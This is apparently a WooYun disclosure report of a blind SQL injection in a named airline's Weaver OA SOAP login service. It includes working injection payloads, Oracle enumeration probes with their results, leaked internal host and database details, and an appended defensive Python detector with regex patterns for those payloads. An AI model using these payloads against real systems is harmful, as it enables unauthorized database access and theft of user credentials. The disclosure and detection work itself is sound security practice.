WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2016-05-27: Details have been sent to the vendor and are awaiting the vendor's handling
2016-05-30: Vendor has confirmed; details disclosed to the vendor only
2016-06-09: Details disclosed to core white hats and experts in the relevant field
2016-06-19: Details disclosed to ordinary white hats
2016-06-29: Details disclosed to intern white hats
2016-07-14: Details disclosed to the public
As the title says.
#1 http://oa.juneyaoair.com//services/
#2 Injection point
POST http://oa.juneyaoair.com//services/MobileService HTTP/1.0
SOAPAction: ""
Content-Type: text/xml

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    <checkUserLogin xmlns="webservices.services.weaver.com.cn">
      <in0>1' or '1'='1</in0>
      <in1>1</in1>
      <in2>1</in2>
    </checkUserLogin>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
With in0 = 1' or '1'='1 the result is 5; with in0 = 1' or '1'='2 the result is 4. The two responses differ, so the parameter is a boolean-based blind injection point.
#3 Wrote a C# program locally to carry out the injection through a relay script.
#4 Data as proof. POC:
1' or (select sys_context('userenv','isdba') from dual)='FALSE' and '1'='1    -> True
1' or (select sys_context('userenv','current_user') from dual)='OA' and '1'='1    -> TRUE
1' or (select sys_context('userenv','db_name') from dual)='oanew' and '1'='1    -> TRUE
1' or (select count(distinct(owner)) from sys.all_tables)=9 and '1'='1    -> TRUE
Username: OA
Current database: oanew
Host name: OA1-SRV
Host IP: 172.20.21.41
Database version: Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
Database
The OA database has 2008 tables in total. POC:
1' or (select count(*) from sys.all_tables where owner='OA')=2008 and '1'='1
Only a portion of the tables was listed.
Dumping was too slow, so I did not continue; carrying on would yield a large amount of data, such as the OA system's usernames and passwords...
Proven!
This is not something of much use; just delete it.
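A defender-side check for the request shape shown in #2 and the probes in #4, written as an added example for this page (it is not code from the report or from the Weaver OA product): it parses the SOAP envelope, pulls out the checkUserLogin parameters, flags the quote-plus-boolean and Oracle sys_context/dual markers used above for alerting, and applies an assumed allow-list to in0. The helper names, the SAFE_USERNAME rule and the constructed sample requests are this example's own assumptions.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape
NS_SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
NS_WEAVER = "webservices.services.weaver.com.cn"  # namespace of checkUserLogin in the report

# Markers taken from the payloads in this report: a quote closing the string literal
# followed by a boolean condition, plus the Oracle probes used for data extraction.
INJECTION_PATTERNS = [
    re.compile(r"'\s*(or|and)\s+'", re.I),              # 1' or '1'='1
    re.compile(r"'\s*(or|and)\s+\(\s*select\b", re.I),  # 1' or (select ... from dual)=
    re.compile(r"\bsys_context\s*\(", re.I),
    re.compile(r"\bfrom\s+dual\b", re.I),
    re.compile(r"\ball_tables\b", re.I),
]
# Assumed allow-list for an OA login name; this is not Weaver's own rule.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9_.@-]{1,64}")

def build_envelope(in0, in1="1", in2="1"):
    """Constructed sample request with the same shape as the one in section #2."""
    return (
        f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{NS_SOAP}"><SOAP-ENV:Header/>'
        f'<SOAP-ENV:Body><checkUserLogin xmlns="{NS_WEAVER}">'
        f"<in0>{escape(in0)}</in0><in1>{escape(in1)}</in1><in2>{escape(in2)}</in2>"
        "</checkUserLogin></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )

def extract_login_params(envelope):
    """Return {in0, in1, in2} of a checkUserLogin call; empty dict for any other call."""
    root = ET.fromstring(envelope)
    call = root.find(f"{{{NS_SOAP}}}Body/{{{NS_WEAVER}}}checkUserLogin")
    if call is None:
        return {}
    return {child.tag.split("}")[-1]: (child.text or "") for child in call}

def flag_injection(envelope):
    """Detection view: (parameter, matched pattern) for each parameter that looks injected."""
    hits = []
    for name, value in extract_login_params(envelope).items():
        for pat in INJECTION_PATTERNS:
            if pat.search(value):
                hits.append((name, pat.pattern))
                break  # one hit per parameter is enough for an alert
    return hits

def accept_login_request(envelope):
    """Validation view: reject unless in0 fits the allow-list (the real fix is a bound parameter)."""
    in0 = extract_login_params(envelope).get("in0")
    return in0 is not None and SAFE_USERNAME.fullmatch(in0) is not None
```

The allow-list is a stopgap at the SOAP layer; the durable fix is binding in0 as a query parameter in the login lookup instead of concatenating it into the SQL text.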
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2016-05-30 08:43
Vulnerability confirmed, thank you.
None